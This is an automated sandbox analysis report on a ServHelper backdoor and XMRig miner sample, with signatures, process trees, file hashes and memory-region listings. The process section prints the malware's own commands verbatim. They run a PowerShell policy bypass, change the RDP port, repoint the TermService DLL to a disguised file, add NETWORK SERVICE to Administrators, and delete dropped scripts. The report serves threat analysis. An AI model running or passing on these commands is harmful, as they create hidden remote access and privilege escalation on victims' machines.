Malware Analysis Report

2024-10-19 04:37

Sample ID 210914-rhbxhsaggq
Target 608b93e344bd3dbb09d0af9da6856061
SHA256 5d45cef43fb4c150c33337fb369a89800f9d235eee1dbdac13a8f6fd13bc1ee4
Tags
servhelper xmrig backdoor miner persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5d45cef43fb4c150c33337fb369a89800f9d235eee1dbdac13a8f6fd13bc1ee4

Threat Level: Known bad

The file 608b93e344bd3dbb09d0af9da6856061 was found to be: Known bad.

Malicious Activity Summary

servhelper xmrig backdoor miner persistence trojan

xmrig

ServHelper

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

Drops file in System32 directory

Drops file in Windows directory

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

Modifies registry key

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-14 14:11

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-14 14:11

Reported

2021-09-14 14:13

Platform

win7v20210408

Max time kernel

6s

Max time network

14s

Command Line

"C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe

"C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-14 14:11

Reported

2021-09-14 14:13

Platform

win10-en

Max time kernel

82s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe"

Signatures

ServHelper

trojan backdoor servhelper

xmrig

miner xmrig

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\rdpclip.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\branding\wupsvc.jpg C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3548 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3548 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3548 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 3748 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3644 wrote to memory of 3748 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3644 wrote to memory of 3748 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3748 wrote to memory of 3716 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3748 wrote to memory of 3716 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3748 wrote to memory of 3716 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3644 wrote to memory of 4080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 4080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 4080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 2460 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 2460 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 2460 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 3688 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 3688 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 3688 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3644 wrote to memory of 424 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3644 wrote to memory of 424 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3644 wrote to memory of 424 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3644 wrote to memory of 1012 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3644 wrote to memory of 1012 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3644 wrote to memory of 1012 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3644 wrote to memory of 2364 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3644 wrote to memory of 2364 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3644 wrote to memory of 2364 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3644 wrote to memory of 2172 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\net.exe
PID 3644 wrote to memory of 2172 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\net.exe
PID 3644 wrote to memory of 2172 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\net.exe
PID 2172 wrote to memory of 2784 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2172 wrote to memory of 2784 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2172 wrote to memory of 2784 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3644 wrote to memory of 584 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3644 wrote to memory of 584 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3644 wrote to memory of 584 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 584 wrote to memory of 740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 584 wrote to memory of 740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 584 wrote to memory of 740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 740 wrote to memory of 696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 740 wrote to memory of 696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 740 wrote to memory of 696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 696 wrote to memory of 1312 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 696 wrote to memory of 1312 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 696 wrote to memory of 1312 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3644 wrote to memory of 1456 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3644 wrote to memory of 1456 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3644 wrote to memory of 1456 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1456 wrote to memory of 1544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1456 wrote to memory of 1544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1456 wrote to memory of 1544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1544 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1544 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1544 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1572 wrote to memory of 1592 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1572 wrote to memory of 1592 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1572 wrote to memory of 1592 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3644 wrote to memory of 2264 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3644 wrote to memory of 2264 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3644 wrote to memory of 2264 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3644 wrote to memory of 1012 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3644 wrote to memory of 1012 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3644 wrote to memory of 1012 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe

"C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zboakoxb\zboakoxb.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1BBB.tmp" "c:\Users\Admin\AppData\Local\Temp\zboakoxb\CSC6678B83EFD544333B99B4AFEEE122FE.TMP"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\SysWOW64\cmd.exe

cmd /c net start rdpdr

C:\Windows\SysWOW64\net.exe

net start rdpdr

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\SysWOW64\cmd.exe

cmd /c net start TermService

C:\Windows\SysWOW64\net.exe

net start TermService

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Files

memory/3548-115-0x0000000005120000-0x000000000551F000-memory.dmp

memory/3548-117-0x0000000005A20000-0x0000000005A21000-memory.dmp

memory/3548-118-0x0000000005750000-0x0000000005751000-memory.dmp

memory/3548-119-0x0000000004D00000-0x0000000004D01000-memory.dmp

memory/3548-120-0x0000000004D02000-0x0000000004D03000-memory.dmp

memory/3548-121-0x0000000004D03000-0x0000000004D04000-memory.dmp

memory/3548-122-0x00000000058C0000-0x00000000058C1000-memory.dmp

memory/3548-123-0x0000000007C00000-0x0000000007C01000-memory.dmp

memory/3548-124-0x0000000004D04000-0x0000000004D05000-memory.dmp

memory/3644-125-0x0000000000000000-mapping.dmp

memory/3644-128-0x0000000000DC0000-0x0000000000DC1000-memory.dmp

memory/3644-129-0x0000000006D00000-0x0000000006D01000-memory.dmp

memory/3644-131-0x00000000066C2000-0x00000000066C3000-memory.dmp

memory/3644-130-0x00000000066C0000-0x00000000066C1000-memory.dmp

memory/3644-132-0x0000000006C30000-0x0000000006C31000-memory.dmp

memory/3644-133-0x0000000007330000-0x0000000007331000-memory.dmp

memory/3644-135-0x00000000075F0000-0x00000000075F1000-memory.dmp

memory/3644-136-0x0000000007400000-0x0000000007401000-memory.dmp

memory/3644-137-0x0000000007EB0000-0x0000000007EB1000-memory.dmp

memory/3644-138-0x0000000007D20000-0x0000000007D21000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

memory/3644-144-0x0000000009380000-0x0000000009381000-memory.dmp

memory/3644-145-0x0000000008A20000-0x0000000008A21000-memory.dmp

memory/3748-146-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\zboakoxb\zboakoxb.cmdline

MD5 d0ca721556c0aecac84c63153d13ac60
SHA1 141718caaa783b7114956ea839226442453e4852
SHA256 2a94500f7cddc780b6bb28564b11724d696c4b90832a453d4c40a4f392ca7c16
SHA512 7b89f9cd9353f335231df0b192370de56d9d8f5b192574008f52d82dcd0568e940fd2403faa7d3209333f236c3e0a1bf552ff826a46c631c7ebe969b02b77e84

\??\c:\Users\Admin\AppData\Local\Temp\zboakoxb\zboakoxb.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

memory/3716-149-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\zboakoxb\CSC6678B83EFD544333B99B4AFEEE122FE.TMP

MD5 9884cdfdca445f9245a876aca44eeb2f
SHA1 6e5b60de8171e1e7d04437cb038bde7cd58d196f
SHA256 9adbafb99cceabee6e76d625d9811e9354596df7b2b6d4cde6879dff38d2c9e0
SHA512 0ccff0c200aa0a6bbc3e36bd001bfe938c499a173a0a9a19ce2e87cbdcf55d86a6a093f4f9c8d18666b0d20443bfeea55b99ffef16036f569fb9b4bbeba57941

C:\Users\Admin\AppData\Local\Temp\RES1BBB.tmp

MD5 261cb7114baae3ece6e3cf0d34d687c1
SHA1 34fef5e12d4ea071c445862555ccb86efe896ea3
SHA256 a998df994f127c87295e1dc1343ec203d4399d2b822f781848acd3eaf01282f0
SHA512 025c3fec8d259ba9d6c35dd787052b74260f45a9a7bb69ea2bea3ad28ca799d6816d7ef65a9ee571c42f38ec2741fec5c7e08cfa9915e79037c8504539225016

C:\Users\Admin\AppData\Local\Temp\zboakoxb\zboakoxb.dll

MD5 d3edbd045bfff76d67b2c22e68b97e13
SHA1 a072ccca2930d907a4b0cc33a76dd58711aa4a3e
SHA256 d520a040375f61b848f15f118743ddd3bd4e0d472951480b0341ebb603d76e90
SHA512 09ce18f829790f7b61016e4b58367441efb770e708e83e3cc3f23a45f21652c8a99a91920d2b448a073409fdf6200868be1c5e6c1547f46762abd49defce9969

memory/3644-153-0x0000000008AA0000-0x0000000008AA1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 794bf0ae26a7efb0c516cf4a7692c501
SHA1 c8f81d0ddd4d360dcbe0814a04a86748f99c6ff2
SHA256 97753653d52aaa961e4d1364b5b43551c76da9bb19e12f741bd67c986259e825
SHA512 20c97972a1256375157f82a859ce4936613fe109d54c63bbec25734edc3a567ca976b342a21ef5f25571b3c1959afe618ad9f9f17a817cfd731d1504541b1a75

memory/3644-155-0x00000000066C3000-0x00000000066C4000-memory.dmp

memory/3644-176-0x0000000008E00000-0x0000000008E01000-memory.dmp

memory/4080-177-0x0000000000000000-mapping.dmp

memory/4080-186-0x0000000004670000-0x0000000004671000-memory.dmp

memory/4080-187-0x0000000004672000-0x0000000004673000-memory.dmp

memory/4080-198-0x0000000008850000-0x0000000008883000-memory.dmp

memory/4080-206-0x0000000008830000-0x0000000008831000-memory.dmp

memory/4080-211-0x0000000008990000-0x0000000008991000-memory.dmp

memory/4080-212-0x0000000008B40000-0x0000000008B41000-memory.dmp

memory/4080-213-0x000000007E860000-0x000000007E861000-memory.dmp

memory/4080-406-0x0000000008AE0000-0x0000000008AE1000-memory.dmp

memory/4080-412-0x0000000008AD0000-0x0000000008AD1000-memory.dmp

memory/2460-432-0x0000000000000000-mapping.dmp

memory/2460-442-0x00000000045B0000-0x00000000045B1000-memory.dmp

memory/2460-444-0x00000000045B2000-0x00000000045B3000-memory.dmp

memory/2460-536-0x000000007F000000-0x000000007F001000-memory.dmp

memory/3688-683-0x0000000000000000-mapping.dmp

memory/3688-699-0x0000000004D90000-0x0000000004D91000-memory.dmp

memory/3688-700-0x0000000004D92000-0x0000000004D93000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 f3068198b62b4b70404ec46694d632be
SHA1 7b0b31ae227cf2a78cb751573a9d07f755104ea0
SHA256 bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8
SHA512 ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795

memory/3688-744-0x000000007EF30000-0x000000007EF31000-memory.dmp

memory/424-962-0x0000000000000000-mapping.dmp

memory/1012-963-0x0000000000000000-mapping.dmp

memory/2364-964-0x0000000000000000-mapping.dmp

memory/2172-1001-0x0000000000000000-mapping.dmp

memory/2784-1002-0x0000000000000000-mapping.dmp

memory/584-1005-0x0000000000000000-mapping.dmp

memory/740-1006-0x0000000000000000-mapping.dmp

memory/696-1007-0x0000000000000000-mapping.dmp

memory/1312-1008-0x0000000000000000-mapping.dmp

memory/1456-1009-0x0000000000000000-mapping.dmp

memory/1544-1010-0x0000000000000000-mapping.dmp

memory/1572-1011-0x0000000000000000-mapping.dmp

memory/1592-1012-0x0000000000000000-mapping.dmp

memory/2264-1025-0x0000000000000000-mapping.dmp

memory/1012-1026-0x0000000000000000-mapping.dmp

memory/3644-1053-0x000000007EDD0000-0x000000007EDD1000-memory.dmp